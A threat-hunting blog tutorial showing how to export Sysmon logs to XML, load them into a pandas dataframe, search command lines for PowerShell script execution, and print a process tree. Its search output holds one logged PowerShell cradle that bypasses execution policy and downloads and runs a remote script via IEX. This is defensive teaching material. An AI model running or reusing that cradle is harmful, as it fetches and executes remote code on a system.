Threat Hunting with sysmon 101 part 4: Loading events in pandas dataframe

4 minute read

Loading sysmon events in pandas dataframe

In the past article, we used powershell scripting to filter the events and perform basic querying, in this article we will load sysmon logs into python, and explore some powerful queries that we can apply to our data to gain better understanding of it.

Exporting events to xml

The first step is to export sysmon events from the event log in xml format. This can be done either using get-winevent, or wevtutil. But, it seems that wevtutil is much faster .

This command uses wevtutil.exe to dump the logs to exported-eventlog.xml file on the desktop in XML format.

WEVTUtil query-events "Microsoft-Windows-Sysmon/Operational" /format:xml /e:events > ~/Desktop/exported-eventlog.xml

Or, this slower version that uses Get-WinEvent powershell command

 Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'} |Export-Clixml -Path ~/Desktop/exported-eventlog.xml

Make sure to run these commands as admin in order to export the logs properly.

Loading Events in python

Parsing XML files in python is easy, we just need to know which nodes/attributes are useful for us, this code snipper will load the xml file, iterate over each event, extract some data from each event, and then store load every thing in pandas dataframe.

import tabulate
from bs4 import BeautifulSoup
import pandas as pd

with open(r'exported-eventlog.xml', 'r' , encoding='utf16') as f:
    data = f.read()

parsed = BeautifulSoup(data, "xml")

events_list  = []
for event in parsed.find_all('Event'):
    evt_dict ={}
    evt_dict['EventID'] = event.find('EventID').text
    evt_dict['Computer'] = event.find('Computer').text
    evt_dict['EventRecordID'] = event.find('EventRecordID').text
    for j in event.find_all("Data"):
        evt_dict[j['Name']] = j.text
    events_list.append(evt_dict)

df = pd.DataFrame(events_list)
print('Loaded %d events' % len(df))

Usecase: Search for execution of .ps1 files

We can use python to do case insensitive searches in the data, in this example, we are using regex to search the “CommandLine” field for powershell executing ps1 script files.

filtered_df = df[(df['CommandLine'].notna()) & (df['CommandLine'].str.match('.*PoWeRSHeLl.*pS1.*',case=0))][['EventID','ProcessId','Image','CommandLine']]
print(tabulate.tabulate(filtered_df ,headers= filtered_df.columns))

And the result shows the execution of the exercise file we used in the last post.

        EventID    ProcessId  CommandLine
----  ---------  -----------  ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 115          1         3900  powershell.exe  -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/11x256/11x256.github.io/test/assets/exercise/th3/1.ps1'))

9082          1         7464  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -command "try { . \"c:\Users\abdo-pc\AppData\Local\Programs\Microsoft VS Code\resources\app\out\vs\workbench\contrib\terminal\browser\media\shellIntegration.ps1\" } catch {}"

Usecase: Create Process Tree

Another thing we can try now is to create a process tree to show the relationships between the processes. In order to create a process tree, we will need 2 things:

identify root nodes, these nodes (processes) don’t have a parent, this can be either due to missing data, or because thats the first process created by the OS.
Create list of children of each node: this will allow us to create the parent-child relationship

The firs step: Prepare the data

In this step will check what nodes are missing from our data ,and we will select a subset of filed to use in the process tree

# List to store all the nodes
nodes = []
# Dictionary to identify missing nodes
nodes_guids = {}
for i in df[df['EventID'] == "1" ].itertuples():
    node = {}
    node['Name'] = i.Image.split('\\')[-1]
    node['Cmd'] = i.CommandLine
    node['ProcessGuid'] = i.ProcessGuid
    node['ParentProcessGuid'] = i.ParentProcessGuid
    node['ProcessId'] = i.ProcessId

    nodes.append(node)
    nodes_guids[i.ProcessGuid] = 1 # set the node in the dict as available

The second step: Create the parent-child relationship

roots = []
children = {}

for i in nodes:
    if nodes_guids.get(i['ParentProcessGuid'] , 0 ) == 0:
        roots.append(i)
    else:
        if i['ParentProcessGuid']  not in children:
            children[i['ParentProcessGuid'] ] = []
        children[i['ParentProcessGuid'] ].append(i)

This code will create a list of roots, nodes without a parent in our set of data. And it will create a list of children for each parent

The third step: Print the tree

Now, we have every thing ready, we just need to print the data using recursion. Recursion is used in order to print the data in the required order, we need to print the root, then the first child, then the first child of the first child, and so on…

root
    child 1
        child 1 1
            child 1 1 1
        child 1 2
        child 1 3
            child 1 3 1
            child 1 3 2
    child 2
    child 3 
    ... 

Using a for loop to print the data , we will get in weird order for a process tree, which will look like this:

root
    child 1
    child 2
    child 3
    child 4
    child 1 1
    child 1 2
    child 3 1
    .... and so on

def print_node(node, indent =0):
    print(' '*indent , node['Name'] , node['ProcessId'])
    for j in children.get(node['ProcessGuid'] , []):
        print_node(j, indent=indent+4)
for i in roots:
    print_node(i)

Which would print something like this, based on what you choose to print

 mscorsvw.exe 1532
 mscorsvw.exe 5964
 chrome.exe 9320
     chrome.exe 6456
     chrome.exe 7568
     chrome.exe 940
     chrome.exe 10788
     chrome.exe 7448
     chrome.exe 3400
     chrome.exe 7060
     chrome.exe 5292
     chrome.exe 11128
     chrome.exe 4340
     chrome.exe 8556
     chrome.exe 8816
     chrome.exe 2052
     chrome.exe 5896
     chrome.exe 7016
     cmd.exe 5292
         conhost.exe 8224
     chrome.exe 768
     chrome.exe 9288
     chrome.exe 9716
     cmd.exe 4264
         conhost.exe 6736
    ....

Threat Hunting posts

Share on

Twitter Facebook LinkedIn

abdo

Threat Hunting with sysmon 101 part 4: Loading events in pandas dataframe

Loading sysmon events in pandas dataframe

Exporting events to xml

Loading Events in python

Usecase: Search for execution of .ps1 files

Usecase: Create Process Tree

The firs step: Prepare the data

The second step: Create the parent-child relationship

The third step: Print the tree

Threat Hunting posts

Share on

You May Also Enjoy

Threat Hunting with sysmon 101 part 3: Command line investigation

Threat Hunting with sysmon 101 part 2: Process creation event

Threat Hunting with sysmon 101 part 1: sysmon installation

Welcome to Jekyll!